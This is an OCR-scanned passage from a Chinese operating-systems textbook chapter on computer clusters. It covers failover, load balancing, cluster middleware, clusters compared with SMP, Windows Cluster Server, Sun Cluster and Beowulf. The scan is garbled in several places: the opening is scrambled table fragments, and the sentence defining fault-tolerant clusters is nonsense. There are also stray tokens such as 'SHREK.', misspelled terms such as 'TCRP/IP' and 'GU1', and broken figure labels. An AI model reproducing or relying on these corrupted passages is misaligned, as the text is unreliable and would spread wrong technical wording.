活跃 从 机 从 服务 器 也 能 用 于 任务 处 理 从 服务 器 可 以 用 于 处 理 


各 服务 器 具有 独自 的 磁盘 ， 数 据 可 

高 可 用 性 
连续 地 从 主 服务 器 复制 至 从 服务 器 
所 有 服务 器 都 连接 到 同一 磁盘 ， 但 










复杂 性 提高 了 








在 进行 复制 操作 时 具有 较 
高 的 网络 和 服务 器 开销 











人 
接 到 磁盘 某 台 服务 器 发 生 故 障 ， 其 磁盘 被 其 他 开销 人 






服务 器 接管 


网 络 和 服务 器 开销 低 ， 需要 加 锁 管 理 软件 ， 通 常 
多 台 服 务 器 同时 共享 对 磁盘 的 访问 | 减少 了 因 磁 盘 故 障 而 引起 | 与 磁盘 镜像 或 RAD 技术 一 
的 停机 风险 起 使 用 


一 种 早期 的 通用 方法 是 被 动 等 待 ， 它 非常 简单 ,让 一 台 计算 机 进行 所 有 的 负载 处 理 , 而 其 他 
计算 机 则 处 于 非 活 既 状 态 ， 等 待 主机 出 现 故障 时 来 接管 。 为 了 协调 所 有 机 器 ， 活 怒 系统 (MER 
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统 ) 周期 性 地 向 等 待机 器 发 送 “ 心 跳 ” 消 息 。 当 这 些 消息 不 再 到 达 时 ， 等 待机 器 就 假定 主 服务 器 
已 发 生 故 障 ， 并 启动 自身 操作 。 这 种 方法 增加 了 可 用 性 , 但 却 没有 提高 性 能 。 而且， 如 果 在 两 个 
系统 之 间 交 换 的 唯一 信息 是 一 个 “心跳 ”消息 , 且 如 果 两 系统 并 不 共享 公共 的 磁盘 ， 则 等 待机 器 
提供 了 一 个 功能 的 备份 ， 却 没有 对 由 主机 管理 的 数据 库 进行 访问 。 

一 般 不 认为 被 动 等 待 模式 是 集群 。 集群 这 个 术语 保留 给 了 多 台 互 联 的 计算 机 , 所 有 计算 机 都 
处 在 处 理 状态 ， 对 外 部 世界 保持 了 一 个 单一 系统 的 映像 。 活 跃 从 机 这 个 术语 常 指 这 种 配置 。 可 以 
定义 三 种 集群 方法 : 独立 服务 器 、 不 共享 和 共享 存储 器 . 

作为 集群 的 一 种 方法 , 每 台 计 算 机 都 是 一 台独 立 服务 器 , 具有 自己 的 磁盘 , 但 系统 之 间 没 有 
共享 的 磁盘 ( 见 图 16.13a )。 这 种 安排 方式 提供 了 高 性 能 和 高 可 用 性 ， 它 需要 某 种 类 型 的 管理 或 
调度 软件 来 将 客户 请 求 分 派 给 服务 器 , 以 达到 负载 平衡 和 获得 较 高 利用 率 的 目的 。 这 种 方法 非常 
需要 故障 补救 能 力 , 即 当 某 台 计 算 机 在 执行 一 个 应 用 程序 时 发 生 了 故障 , 集群 中 的 另 一 台 机 器 可 
以 接替 该 计算 机 并 完成 该 应 用 。 为 了 达到 这 一 目的 , 数据 必须 经 常 地 在 系统 之 间 进 行 复制 , 这 样 ， 
每 个 系统 访问 的 才 是 其 他 系统 的 当前 数据 。 由 于 数据 交换 产生 了 一 些 开销 , 从 而 以 性 能 的 降低 为 
代价 保障 了 系统 的 高 可 用 性 。 

为 了 减少 通信 开销 , 现在 的 很 多 集群 都 是 由 连接 到 公共 磁盘 的 服务 器 组 成 的 ( 见 图 16.13b )。 这 
种 方法 带 来 的 变化 简单 地 称 为 不 共享 。 公 共 磁 盘 被 分 成 若干 卷 ， 每 个 卷 由 一 台 计 算 机 占用 ， 如 果 一 
台 计算 机 发 生 故障 ， 则 集群 必须 重新 配置 ， 使 其 他 计算 机 拥有 对 发 生 故障 的 计算 机 的 卷 的 所 有 权 。 

让 多 台 计 算 机 同时 共享 相同 的 磁盘 也 是 可 以 的 ( 称 为 共享 磁盘 方式 )， 这 样 ， 每 台 计 算 机 具 
有 对 所 有 磁盘 上 的 所 有 卷 的 访问 权 。 这 种 方法 需要 使 用 某 种 类 型 的 上 锁 机 制 , 以 确保 数据 在 某 一 
时 刻 只 能 被 一 台 计 算 机 访问 。 


16.4.2 ”操作 系统 的 设计 问题 

完全 开发 集群 硬件 配置 需要 增强 单 系统 操作 系统 的 某 些 功能 。 
故障 管理 

集群 怎样 管理 故障 取决 于 所 使 用 的 集群 方法 ( 见 表 16.2 )。 总 的 来 说 ， 有 两 种 方法 可 以 用 于 
处 理 故障 :高度 可 用 的 集群 和 容错 集群 。 一 个 高 度 可 用 集群 能 以 较 高 的 概率 使 所 有 资源 用 于 服务 。 
如 果真 发 生 故 障 , 例如 某 一 系统 停机 或 丢失 了 一 个 磁盘 卷 , 则 正在 进行 的 询问 将 丢失 。 如 果 执 行 
重 试 操作 , 任何 丢失 的 询问 将 由 集群 中 的 另 一 台 计 算 机 来 服务 。 然 而 , 集群 操作 系统 并 不 保证 事 
务 的 部 分 执行 状态 。 这 将 需要 在 应 用 级 进行 处 理 。 

容 氏 人 天 供 证 所 有 灾 源 人 是 可 用 的 .这 可 以 和 过 使 用 克 人 共 人 丰 盘 和 取消 完成 事务 及 所 
已 完成 事务 的 机 制 来 完成 。 

将 应 用 程序 和 数据 资源 从 发 生 故 障 的 系统 交换 到 集群 中 另 一 个 系统 上 的 功能 称 做 故障 补救 
( failover )。 相 关 的 一 个 功能 是 ， 一 旦 原 系统 已 被 修复 ， 则 将 应 用 程序 和 数据 资源 恢复 到 原来 系 
统 ， 这 称 为 故障 恢复 〈failback )。 故 障 恢复 可 以 自动 进行 , 但 这 只 有 当 问 题 真正 被 修复 并 不 会 再 
发 生 时 才 是 真正 故障 恢复 。 否 则 , 自动 故障 恢复 可 能 导致 后 续 的 发 生 故 障 的 资源 在 计算 机 之 间 来 
回 反弹 ， 从 而 导致 性 能 和 恢复 问题 。 


负载 平衡 

集群 需要 在 可 用 的 计算 机 之 间 平 衡 负载 的 有 效能 力 ， 当 集群 规模 扩大 时 也 要 求 执行 负载 平 
衡 。 当 一 台新 的 计算 机 加 入 到 集群 中 时 , 负载 平衡 机 制 应 能 够 自动 地 在 应 用 调度 时 包括 这 人 台 计 算 
机 。 中 间 件 机 制 需 要 识别 出 可 以 出 现在 集群 中 的 不 同 成 员 上 的 服务 , 并 且 可 以 将 服务 从 集群 中 的 
一 个 成 员 转 移 到 另 一 个 成 员 上 。 
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并 行 计 算 
在 某 些 情况 下 ,对 集群 的 有 效 使 用 要 求 并 行 地 执行 一 个 单一 应 用 的 软件 。 [KAPP00 ] 列 出 了 
三 种 解决 该 问题 的 常用 方法 : 
O 并 行 编译 器 : 并 行 编译 器 在 编译 时 决定 了 应 用 程序 的 哪 一 部 分 可 以 并 行 地 执行 。 这 些 部 
分 然后 被 分 开 ， 分派 到 集群 中 的 不 同 计算 机 上 。 性 能 取决 于 问题 本 身 以 及 编译 器 设计 的 
好 坏 。 
@ 并 行 应 用 程序 : 在 这 种 方法 中 ， 程 序 员 在 编写 应 用 程序 时 ， 从 开始 到 运行 的 过 程 中 都 要 
考虑 在 需要 的 时 候 ， 使 用 消息 传递 机 制 ， 将 数据 在 集群 的 不 同 节点 上 移动 。 这 将 给 程序 
员 带 来 很 重 的 负担 ， 但 这 也 许 是 针对 某 些 应 用 程序 开发 集群 的 最 好 方法 。 
© 参数 化 计算 : 这 种 方法 使 用 的 背景 是 ， 应 用 程序 基本 上 是 一 个 必须 执行 很 多 次 数 的 算法 
或 程序 ， 而 每 次 都 具有 不 同 的 开始 条 件 或 参数 。 仿 真 模型 是 一 个 很 好 的 例子 ， 它 将 运行 
大 量 不 同 的 场景 以 及 开发 结果 的 统计 摘要 。 为 了 使 这 种 方法 更 加 有 效 ， 需 要 参数 处 理工 
具 来 按照 顺序 组 织 、 运 行 和 管理 作业 。 


16.4.3 ”集群 计算 机 的 体系 结构 


图 16.14 给 出 了 一 个 典型 的 集群 体系 结构 。 独 立 的 计算 机 通过 某 种 高 速 局 域 网 或 交换 硬件 设 
SHREK. 每 台 计 算 机 都 能 够 独立 地 运行 。 另 外, 每 台 计算 机 上 都 安装 了 一 个 中 间 件 层 的 软件 
以 支持 集群 操作 。 集 群 中 间 件 为 用 户 提供 了 统一 的 系统 映像 , 这 是 大 家 熟知 的 单一 系统 映像 。 中 
间 件 也 负责 提供 高 可 用 性 保证 ， 其 方法 是 依靠 负载 平衡 和 对 独立 组 件 故障 的 响应 。[ HWAN99 ] 
列 出 了 以 下 期 望 的 集群 中 间 件 服务 和 功能 : 

@ 单一 入 口 点 : 用 户 登 录 到 集群 ， 而 不 是 登录 到 一 台独 立 的 计算 机 。 

@ 单一 文件 层次 : 用 户 在 同一 根 目 录 下 看 到 的 是 单一 层次 的 文件 目录 。 

@ 单一 控制 点 : 有 一 台 默 认 的 工作 站 用 于 集群 管理 和 控制 。 

@ 单一 虚拟 网 络 连 接 : 任意 节点 都 可 以 访问 集群 中 任何 其 他 的 点 ， 即 使 实际 的 集群 配置 可 
能 由 多 个 互联 网 络 所 组 成 。 只 存在 一 种 虚拟 网 络 操作 。 
单一 存储 空间 : 分 布 式 共享 存储 器 使 程序 能 够 共享 变量 。 

@ 单一 作业 管理 系统 : 在 一 个 集群 作业 调度 器 之 下 ， 用 户 可 以 提交 作业 而 不 需要 指明 由 哪 

台 计 算 机 来 执行 作业 。 





高 速 网 络 /交换 设备 
图 16.14 集群 计算 机 体系 结构 
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@ 单一 用 户 界面 : 一 个 公共 的 图 形 界面 支持 所 有 的 用 户 , 而 不 管 是 从 哪个 工作 站 进入 集群 的 。 
@ 单一 MO 空间 : 任何 节点 都 可 以 远程 访问 任何 IO 设备 或 磁盘 设备 ， 而 不 用 知道 它们 的 


物理 位 置 。 

@ 单一 进程 空间 : 使 用 一 种 统一 的 进程 标识 方法 ， 任 何 节点 上 的 一 个 进程 可 以 创建 远程 节 
点 上 的 其 他 进程 或 与 之 通信 。 

@ 检测 点 技术 : 这 个 功能 周期 性 地 保存 进程 状态 和 中 间 计 算 结 果 ， 使 得 在 故障 之 后 能 够 
恢复 。 


@ 进程 迁移 : 这 个 功能 支持 负载 平衡 。 
上 面 列 出 的 最 后 4 项 增强 了 集群 的 可 用 性 ， 其 余 各 项 负责 提供 单一 系统 映像 。 
返回 图 16.14， 一 个 集群 也 包括 支持 并 行 执行 的 程序 能 够 高 效 执行 的 软件 工具 。 


16.4.4 ”集群 与 SMP 的 比较 


集群 系统 和 对 称 多 处 理 器 系统 (SMP ) 都 为 支持 高 性 能 应 用 提供 了 一 种 使 用 多 个 处 理 器 来 实 
现 的 方法 。 尽 管 SMP 已 经 出 现 很 人 和 了， 这 两 种 解决 方法 在 商业 上 都 是 可 行 的 。 

SMP 方法 的 主要 优势 是 它 比 集群 易于 管理 和 配置 。SMP 与 原来 的 单 处 理 器 模型 更 接近 ， 几 
乎 所 有 的 应 用 程序 都 是 为 该 模型 编写 的 ,从 单 处 理 器 发 展 到 SMP 的 过 程 主要 的 变化 是 调度 功能 。 
SMP 的 另 一 优点 是 它 通常 占 据 更 少 的 物理 空间 ， 且 比 集群 消耗 更 少 的 能 量 。SMP 方法 的 最 后 一 
个 重要 的 优点 是 易于 建立 并 且 稳定 。 

然而 从 长 远 来 看 , 集群 方法 的 优点 可 能 会 导致 集群 将 占领 高 性 能 服务 器 的 主流 市 场 。 集群 在 
增长 性 和 绝对 规模 上 比 SMP 要 优越 很 多 。 集 群 在 可 用 性 上 也 很 好 ， 因 为 系统 的 所 有 组 件 都 可 以 
做 到 高 度 元 余 。 


16.5 Windows 集群 服务 器 


Windows 集群 服务 器 (以 前 的 代码 称 为 Wolfpack) 是 一 种 不 共享 集群 ， 每 个 磁盘 卷 和 其 他 
资源 在 某 一 时 刻 由 单个 系统 所 拥有 。 
Windows 集群 服务 器 的 设计 使 用 了 下 列 概 念 ; 
o 集群 服务 : 每 个 节点 上 的 软件 包 ， 管理 所 有 与 集群 相关 的 行为 。 
@ 资源 : 由 集群 服务 所 管理 的 一 个 对 象 。 所 有 资源 都 代表 了 系统 中 实际 的 资源 对 象 ， 包 括 
物理 硬件 设备 ， 例 如 磁盘 驱动 器 和 网 卡 以 及 导 辑 项 ， 例 如 逻辑 磁盘 卷 、TCRP/IP 地 址 、 整 
个 应 用 程序 和 数据 库 。 
o 在 线 : 当 资 源 在 指定 节点 上 提供 服务 时 ， 则 认为 资源 在 该 节点 上 是 在 线 的 。 
o 组 : 作为 一 个 单位 进行 管理 的 一 组 资源 。 通 常 ， 一 个 组 含有 为 了 运行 特定 应 用 程序 所 需 
的 所 有 元 素 以 及 由 应 用 程序 联接 到 的 远程 系统 所 提供 的 服务 。 
组 的 概念 尤其 重要 , 不 管 是 对 故障 恢复 还 是 负载 平衡 都 是 这 样 , 组 将 资源 组 成 更 大 的 易于 管 
理 的 单位 。 在 一 个 组 上 进行 的 操作 , 例如 将 组 传送 到 其 他 节点 上 ,会 自动 地 影响 组 中 的 所 有 资源 。 
资源 采用 动态 链接 库 (Dynamically Linked Libarary, DLL) 的 形式 来 实现 ,并 由 一 个 资源 监控 器 
来 管理 。 资源 监控 器 通过 远程 过 程 调用 和 应 答 集群 服务 命令 与 集群 服务 进行 交互 , 以 配置 和 移动 
资源 组 。 
图 16.15 给 出 了 Windows 集群 服务 器 的 组 件 及 其 在 一 个 集群 的 单一 系统 中 的 相互 关系 。 节 
点 管理 器 负责 维护 该 节点 在 集群 中 的 成 员 资格 。 它 周期 性 地 向 集群 中 其 他 节点 上 的 节点 管理 器 发 
送 “ 心 跳 ” 消 息 ， 当 一 个 节点 管理 器 从 另 一 个 集群 节点 检测 到 “心跳 ”消息 丢失 时 ， 它 就 向 整个 
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集群 广播 一 条 消息 , 以 使 所 有 成 员 交 换 消息 来 核实 它们 的 当前 集群 的 成 员 。 如果 一 个 节点 管理 器 
没有 应 答 ， 它 就 被 从 集群 中 移出 其 活动 的 组 也 被 传送 到 集群 中 一 个 或 多 个 活跃 节点 上 。 

配置 数据 库 管理 器 ( configuration database manager ) 维护 着 集群 的 配置 数据 库 , 数据 库 中 含 
有 关于 资源 和 组 以 及 组 的 节点 归属 性 的 信息 。 每 个 集群 节点 上 的 数据 库 管 理 器 相互 协作 以 维护 配 
置信 息 的 一 致 性 。 容 错 事务 软件 用 于 确保 整个 集群 配置 的 变化 一 致 和 正确 地 执行 。 


集群 管理 工具 





、 
` 
\ 
/ 
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通信 管理 器 Je oat 


pe 






资源 管理 接口 


感知 不 到 
的 应 用 


资源 管理 器 /故障 补救 管理 器 ( resource manager/failover manager) 决定 对 资源 的 分 组 ， 并 启 
动 相应 的 动作 , 例如 分 组 开始 、 分 组 复位 和 故障 补救 。 当 需要 故障 补救 时 , 活跃 节点 上 的 故障 补 
救 管 理 器 共同 合作 , 一 起 协商 把 故障 系统 中 的 资源 组 分 布 到 其 他 活跃 系统 中 去 。 当 故障 系统 重新 
启动 时 , 故障 补救 管理 器 能 够 决定 将 某 些 组 移 回 这 个 系统 。 特 别 地 , 任何 组 都 可 以 被 配置 一 个 默 
认 的 所 有 者 。 如 果 该 所 有 者 出 现 故 障 且 后 来 重启 动 了 , 则 该 组 在 回 滚 操作 中 被 移 回 到 原来 的 节点 。 

事件 处 理 器 〈event processor) 连接 了 集群 服务 的 所 有 组 件 ， 处 理 公 共 操 作 并 控制 集群 服务 
的 初始 化 。 通 信 管 理 器 管理 着 与 集群 的 所 有 其 他 节点 的 消息 交换 。 全 局 更 新 管理 器 提供 了 一 个 服 
务 ， 被 集群 服务 中 的 其 他 组 件 所 使 用 。 


16.6 Sun 集群 


Sun 集群 是 一 个 分 布 式 的 操作 系统 ， 它 是 作为 基本 Solaris UNIX 系统 的 一 组 扩展 而 构建 的 。 
它 提 供 了 具有 单一 系统 映像 的 集群 ， 即 集群 是 作为 运行 了 Solaris 操作 系统 的 单一 计算 机 而 呈现 
在 用 户 和 应 用 程序 面前 的 。 

图 16.16 展示 了 Sun 集群 的 整体 结构 。 它 的 主要 部 分 有 : 对 象 和 通信 支持 、 进 程 管理 、 网 络 
连接 、 全 局 分 布 式 文件 系统 。 


图 16.15 Windows 集群 服务 器 框图 
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对 象 调用 


现 有 的 Solaris 内 核 


“图 16.16 Sun 集群 结构 





16.6.1 对象 和 通信 支持 


Sun 集群 的 实现 是 面向 对 象 的。 利用 CORBA 对 象 模型 (参见 附录 B ) 来 定义 对 象 ， 在 Sun 
集群 中 也 实现 了 远程 过 程 调用 (RPC) 机 制 。CORBA 的 接口 定义 语言 (IDL) 用 于 定义 不 同 节 
点 中 MC 组 件 之 间 的 接口 。MC 的 各 元 素 由 面向 对 象 语言 C++ 实现 。 统 一 对 象 模型 和 IDL 的 使 用 
提供 了 一 种 机 制 ， 用 于 节点 间 和 节点 内 进程 间 的 通信 。 所 有 这 些 都 建立 在 Solaris 内 核 之 上 ， 基 
本 上 没有 要 求 内 核 有 任何 变化 。 


166.2 ”进程 管理 


全 局 进程 管理 扩展 了 进程 操作 ， 这 样 ， 进 程 的 位 置 对 于 用 户 是 透明 的 。Sun 集群 维护 了 对 进 
程 的 一 种 全 局 视图 , 因此 , 集群 中 的 每 个 进程 具有 一 个 唯一 的 标识 符 , 并 且 每 个 节点 都 能 够 掌握 
每 个 进程 的 位 置 和 状态 。 可 以 执行 进程 迁移 ( 在 第 18 章 中 描述 ): 一 个 进程 可 以 在 其 生命 期 中 从 
一 个 节点 移动 到 另 一 个 节点 , 这样 就 实现 了 负载 平衡 或 用 于 故障 补救 。 然 而 , 进程 中 的 所 有 线程 
必须 在 相同 节点 上 。 


16.6.3 ”网 络 连接 


Sun 集群 的 设计 者 考虑 了 解决 网 络 通信 问题 的 三 种 方法 : 

1 ) 在 一 个 节点 上 执行 所 有 的 网 络 协议 处 理 。 特 别 是 对 于 基于 TCP/IP 的 应 用 程序 , 到 达 (和 
流出 ) 的 信息 将 通过 一 个 网 络 连接 节点 。 对 于 到 达 的 信息 ， 将 分 析 TCP 和 IP 报 文 头 ， 
并 将 封装 的 数据 转发 到 相应 的 节点 ; 对 于 流出 的 信息 ， 则 将 来 自 其 他 节点 的 数据 封装 在 
TCP/IP 报 文 头 中 。 这 种 方法 不 适用 于 节点 较 多 的 情况 ， 因 此 没有 采用 。 

2 ) 为 每 个 节点 分 配 一 个 唯一 的 IP 地 址 , 且 直 接 在 外 部 网 络 的 节点 上 运行 网 络 协议 。 这 种 方 
法 的 一 个 缺点 是 集群 配置 对 于 外 界 不 再 透明 。 另 一 缺点 是 当 一 个 正在 运行 的 应 用 程序 要 
移动 到 另 一 个 具有 不 同 底层 网 络 地 址 的 节点 时 ， 难 于 进行 故障 补救 。 

3 ) 使 用 报 文 过 滤器 将 报 文 路 由 到 正确 的 节点 ， 并 在 该 节点 上 执行 协议 处 理 。 从 外 界 看 来 ， 
集群 就 像 一 个 具有 单一 IP 地 址 的 服务 器 。 到 达 的 连接 ( 客户 请 求 ) 在 集群 中 的 可 用 节点 
之 间 进 行 负载 平衡 。 这 是 Sun 集群 所 采用 的 方法 。 

Sun 集群 网 络 连接 子 系统 具有 三 个 关键 元 素 : 

1) 进入 的 报 文 首先 在 具有 网 络 适配器 物理 连接 的 节点 上 接收 ， 该 接收 节点 过 滤 报 文 ， 然 后 
通过 集群 互联 系统 将 报 文 分 发 到 相应 的 目标 节点 。 

2) 所 有 的 流出 报 文通 过 集群 互联 系统 路 由 到 具有 外 部 网 络 物理 连接 的 节点 (或 者 是 多 个 可 
选 节点 中 的 一 个 )。 对 流出 报 文 的 所 有 协议 的 处 理 是 由 发 送 报 文 的 节点 完成 的 。 

3 ) 维护 一 个 全 局 网 络 配置 数据 库 ， 以 掌握 到 每 个 节点 的 网 络 通信 重 。 
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16.6.4 全 局 文件 系统 


Sun 集群 的 一 个 最 为 重要 的 元 素 是 全 局 文件 系统 (global file system), WA 16.17， 这 里 与 
具有 基本 Solaris 配置 的 MC 文件 管理 进行 了 比较 。 两 者 都 建立 在 虚 节 点 和 虚拟 文件 系统 的 概念 
的 使 用 上 。 





a) 标准 Solaris b) Sun 集群 


图 16.17 Sun 集群 文件 系统 扩展 


在 Solaris 中 ， 虚 节点 (vnode ) 结构 用 于 为 所 有 类 型 的 文件 系统 提供 有 效 的 通用 的 接口 。 虚 
节点 用 于 将 存储 器 页 映像 到 一 个 进程 的 地 址 空间 ， 并 允许 访问 文件 系统 。inode 用 于 将 进程 映像 至 
UNIX 文件 , 而 虚 节 点 可 以 将 进程 映像 到 任何 文件 系统 类 型 中 的 一 个 对 象 。 这 样 ， 系统 调 用 不 需要 
了 解 要 操作 的 实际 对 象 ， 只 需 知 道 如 何 使 正确 的 面向 象 类 型 的 调用 来 使 用 虚 节 点 接口 。 虚 节点 接 
口 接受 通用 的 文件 操作 命令 ， 例 如 读 和 写 ， 并 将 它们 转换 成 当前 文系 统 上 的 相应 的 动作 。 正 如 虚 
节点 用 于 描述 独立 的 文件 系统 对 象 ， 虚 拟 文件 系统 (VES) 结构 用 于 描述 整个 文件 系统 。VFS 接 
口 接受 在 整个 文件 系统 上 操作 的 通用 命令 ， 并 将 它们 转换 成 适合 于 当前 文件 系统 的 相应 的 动作 。 

在 Sun 集群 中 ， 全 局 文件 系统 为 分 布 在 集群 上 的 文件 提供 了 一 个 统一 的 接口 。 一 个 进程 可 
以 打开 一 个 位 于 集群 中 任何 位 置 的 文件 , 且 所 有 节点 上 的 进程 可 以 使 用 相同 的 路 径 来 定位 一 个 文 
件 。 为 了 实现 全 局 文件 访问 ，MC 包括 了 一 个 代理 文件 系统 ， 它 建立 在 现 有 的 Solaris 文件 系统 
的 虚 节 点 接口 之 上 。VFS/VNODE 操作 由 代理 层 转换 成 对 象 调用 ( 见 图 16.17b )。 被 调用 的 对 象 
可 以 驻 留 在 系统 中 的 任何 节点 上 。 被 调用 的 对 象 在 下 层 文件 系统 上 执行 一 个 本 地 VNODE/VFS 
操作 ， 无 论 是 内 核 还 是 已 有 的 文件 系统 都 不 需要 为 支持 这 种 全 局 文件 环境 而 改变 。 

为 了 减少 远程 对 象 调用 的 数目 ,可 使 用 高 速 缓存 技术 。Sun 集群 支持 对 文件 内 容 、 目 录 信 息 
和 文件 属性 的 高 速 缓存 。 


16.7 Beowulf 和 Linux 集群 


1994 年 ，Beowulf 项 目 在 NASA 的 高 性 能 计算 和 通信 (HPCC ) 工程 的 赞助 下 开始 启动 。 其 
目标 是 研究 在 执行 重要 计算 任务 时 ,构成 集群 的 个 人 计算 机 以 最 小 的 代价 超出 同时 代 工 作 站 的 能 
力 的 潜能 。 今天，Beowulf 方 法 已 经 得 到 广泛 实现 ， 并 成 为 最 重要 的 可 用 集群 技术 。 


16.7.1 Beowulf 特征 
Beowulf 的 重要 特征 如 下 [ RIDG97 |: 
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大 量 的 市 场 常 见 的 部 件 。 、 
专用 处 理 器 〈 而 不 是 获取 空闲 工作 站 的 时 钟 周期 )。 
专用 、 私 用 网 络 〈 局 域 网、 广域网 或 网 际 互联 的 联合 体 )。 
没有 可 定制 组 件 。 
容易 从 多 个 销售 商 复制 。 
可 伸缩 的 IO。 
基于 自由 软件 构建 。 
可 以 使 用 分 布 式 的 自由 软件 计算 工具 ， 并 且 只 需要 进行 很 小 的 改变 。 

@ 设计 和 改进 返回 给 社区 /团体 。 

尽管 Beowulf 软件 的 各 个 组 成 元 素 已 经 在 很 多 不 同 的 平台 上 得 以 实现 , 首要 的 基础 性 的 选择 
是 Linux, 大 多 数 Beowulf 实现 使 用 了 Linux 工作 站 或 PC 的 集群 。 图 16.18 给 出 了 一 种 代表 性 的 
配置 , 集群 由 很 多 工作 站 组 成 。 尽 管 硬件 平台 可 能 不 同 , 但 都 运行 Linux 操作 系统 。 每 台 工 作 站 
上 的 辅 存 可 以 用 于 分 布 式 的 访问 ( 用 于 分 布 式 文件 共享 、 分 布 式 虚拟 存储 器 或 其 他 用 途 )。 集 群 
的 节点 (Linux AS) 使 用 商用 联网 方法 进行 互联 ， 典 型 的 是 以 太 网 。 以 太 网 所 支持 的 形式 可 能 
是 单个 以 太 网 交换 机 或 互联 的 一 组 交换 机 。 使 用 标准 数据 传输 速率 ( 10Mb/s、100Mb/s 或 1Gb/s ) 
的 商用 以 太 网 产品 。 


分 布 式 共享 
wie 





Linux 


BS 工作 站 


图 16.18 一 般 的 Beowulf 配置 


16.7.2 Beowulf 软件 


Beowulf 软件 环境 已 经 作为 一 个 部 件 在 著名 的 可 用 于 商业 计算 机 的 自由 软件 一 一 Linux 上 得 
以 实现 。 最 重要 的 开源 的 Beowulf 软件 是 www.beowulf.org 发 布 的 Beowulf 套件 ,不 过 其 他 的 组 
织 也 发 布 了 一 些 Beowulf 的 软件 套件 和 工具 。 

Beowulf 集群 的 每 一 个 节点 都 作为 一 个 独立 的 Linux 系统 ， 在 上 面 运 行 了 Linux 内 核 。 为 了 
支持 Beowulf 集群 概念 ,对 Linux 内 核 做 了 扩展 ,使 独立 的 节点 能 够 加 入 到 多 个 全 局 名 字 空 间 中 。 
Beowulf 系统 软件 的 例子 包括 : 

@ Beowulf 分 布 式 进程 空间 ‘BPROC): 这 个 软件 包 可 以 让 一 个 进程 ID 空间 横 跨 集群 环境 
的 多 个 节点 ， 也 提供 了 在 其 他 节点 上 启动 进程 的 机 制 。 这 个 软件 包 的 目标 是 提供 在 
Beowulf 集群 上 进行 单一 系统 映像 所 需 的 关键 性 元 素 。BPROC 提供 了 一 种 机 制 ， 在 远程 
节点 上 启动 进程 时 不 需要 先 登 录 到 其 他 节点 上 ， 并 使 所 有 的 远程 进程 在 集群 的 前 端 节点 
的 进程 表 中 可 见 。 

e Beowulf 以 太 网 通道 绑 定 : 这 是 一 种 将 多 个 低 价 网 络 组 合 起 来 构成 一 个 具有 较 高 带宽 的 
单一 逻辑 网 络 的 机 制 。 如 果 使 用 单个 网 络 接 口 ， 则 唯一 需要 的 额外 工作 是 一 个 较为 简单 
的 任务 ， 即 把 数据 包 分 布 在 可 用 设备 传输 队列 中 。 这 种 方法 支持 对 由 以 太 网 连接 的 多 台 
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Linux 工作 站 的 负载 平衡 。 
@ Pvmsync: 这 是 一 个 编程 环境 ,为 Beowulf 集群 中 的 进程 提供 同步 机 制 和 共享 数据 对 象 。 
è EnFuzion: EnFuzion 由 一 组 执行 参数 化 计算 的 工具 组 成 , 关于 参数 化 计算 在 16.4 节 已 有 
叙述 。 参 数 化 计算 包括 作为 很 大 数目 作业 的 一 个 程序 的 执行 ， 每 个 作业 具有 不 同 的 参数 
或 开始 条 件 。EnFuzion 仿效 了 在 一 台 根 节点 机 器 上 的 一 组 机 器 人 用 户 ， 每 个 用 户 将 登录 
到 很 多 客户 节点 机 器 中 的 一 台 上 。 每 个 作业 都 被 设置 成 运行 一 个 唯一 的 、 可 编程 的 场景 ， 
具有 相应 的 一 组 开始 条 件 [ KAPP00 J. 


16.8 ”小结 


客户 /服务 器 计算 是 实现 信息 系统 和 网 络 潜 能、 明显 改善 整个 组 织 的 生产 效率 的 关键 。 有 了 
客户 /服务 器 计算 ， 应 用 程序 就 可 以 分 布 到 单 用 户 工作 站 和 个 人 计算 机 的 用 户 上 ， 同 时 能 够 共享 
和 应 该 共享 的 资源 在 服务 器 系统 上 维护 ， 这 样 所 有 客户 都 能 使 用 。 因 此 ， 客 户 /服务 器 结构 是 一 
种 分 散 式 和 集中 式 计 算 的 结合 。 

一 般 而 言 ， 客 户 系统 提供 图 形 用 户 界面 (GU1 )， 使 用 户 能 够 以 最 少 的 培训 、 较 容易 地 使 用 
各 种 应 用 程序 。 服 务 器 支持 共享 应 用 程序 , 例如 数据 库 管理 系统 。 实 际 应 用 程序 分 为 客户 部 分 和 
服务 器 部 分 ， 分 割 的 根据 是 使 易 用 性 和 性 能 达到 最 优 。 

任何 分 布 式 系 统 中 都 需要 的 关键 机 制 是 进程 间 通 信 ，, 现在 普遍 使 用 两 种 技术 。 消 息 传递 机 制 
推广 了 单一 系统 中 消息 的 使 用 , 且 使 用 相同 种 类 的 协定 和 同步 规则 。 另 一 种 方法 是 使 用 远程 过 程 
调用 ， 对 于 这 种 技术 ， 不同 机 器 上 的 两 个 程序 使 用 过 程 调用 /返回 语法 和 语义 进行 交互 。 无 论 是 
被 调用 的 程序 还 是 调用 程序 ， 其 行为 就 像 是 运行 在 相同 的 机 器 上 。 

集群 是 一 组 互联 的 完整 的 计算 机 ,一 起 作为 统一 的 计算 资源 而 工作 ,给 人 以 一 台 机 器 的 感觉 。 
完整 的 计算 机 表示 该 系统 离开 了 集群 之 后 自己 仍 可 独立 地 运行 。 


16.9 ”推荐 读物 和 网 站 


[ SING99 ] 的 内 容 很 好 地 覆盖 了 本 章 的 主题 。[ BERS96 1 对 于 将 应 用 程序 分 配 到 客户 和 服务 器 上 以 及 
中 间 件 方法 中 包括 的 设计 问题 给 出 了 很 好 的 技术 讨论 ; 该 书 也 讨论 了 产品 和 标准 化 方面 的 成 就 。[ BRITO | 
和 [ MENA05 ] 提供 了 远程 过 程 调用 和 分 布 式 消息 传递 的 性 能 比较 。 
[ TANE85 ] 给 出 了 分 布 式 操作 系统 的 综述 ,包括 分 布 式 进程 通信 和 分 布 式 进程 管理 。[ CHAN90 ] 提供 
了 对 分 布 式 消 息 传 递 操作 系统 的 一 个 综述 。[ TAY90 ] 是 对 各 种 操作 系统 在 实现 远程 过 程 调用 中 所 采用 的 方 
法 的 一 个 综述 。 对 集群 的 深入 介绍 可 以 在 | BUYY99a ] 和 [ BUYY99b ] 中 找到 ， 前 者 和 [ RIDG97 ] 有 对 
Bewulf 的 很 好 的 介绍 。 
[ RAJA00 ] 对 Beowulf 提供 了 更 详细 的 介绍 。[ SUN99 ] 和 [ KHAL96 ] 中 描述 了 SUN 集群 。[LAI06] 
提供 了 对 瘦 客 户 端 体系 结构 的 近 距 离 访问 。 
BERS96 Berson, A. Client/Server Architecture. New York: McGraw-Hill, 1996. 
BRIT04 Britton, C. IT Architectures and Middleware. Reading, MA: Addison-Wesley,2004. 
BUYY99a Buyya, R. High Performance Cluster Computing: Architectures and Systems.Upper Saddle River, 
NJ: Prentice Hall, 1999. 
